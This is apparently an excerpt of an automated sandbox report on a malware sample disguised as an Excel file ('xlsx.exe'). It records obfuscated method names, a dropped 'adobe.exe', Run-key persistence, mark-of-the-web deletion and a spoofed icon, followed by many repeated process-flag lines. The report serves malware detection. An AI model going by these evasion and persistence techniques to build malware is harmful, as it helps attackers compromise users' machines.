                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, b3yglJ52boJJBcwNHd.csHigh entropy of concatenated method names: 'ujRwnr3QMi', 'eVfw8WqdTc', 'VfdwkHwxl2', 'eoAwg5whOM', 'IfKw05feTq', 'fIhw6N5TEs', 'ueSwTFOaZO', 'zDJwYfkeLY', 'RXuwJKAesj', 'SIQwv3wtpq'
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, GSnIefby3g48AVtXRC.csHigh entropy of concatenated method names: 'TW9XB3BvfO', 'EfRXeystKT', 'mw0Xax4eFh', 'NF4Xm2TJV6', 'oSGXAuqZ3R', 'WVIXqWXalX', 'xkNX5fM5P1', 'uYvXjvp5VK', 'X5nXNDf69K', 'aYlXCpomsL'

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile written: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile created: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to dropped file
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (81).png
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: Possible double extension: xlsx.exeStatic PE information: PRE ALERT Docs_PONBOM01577.xlsx.exe
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
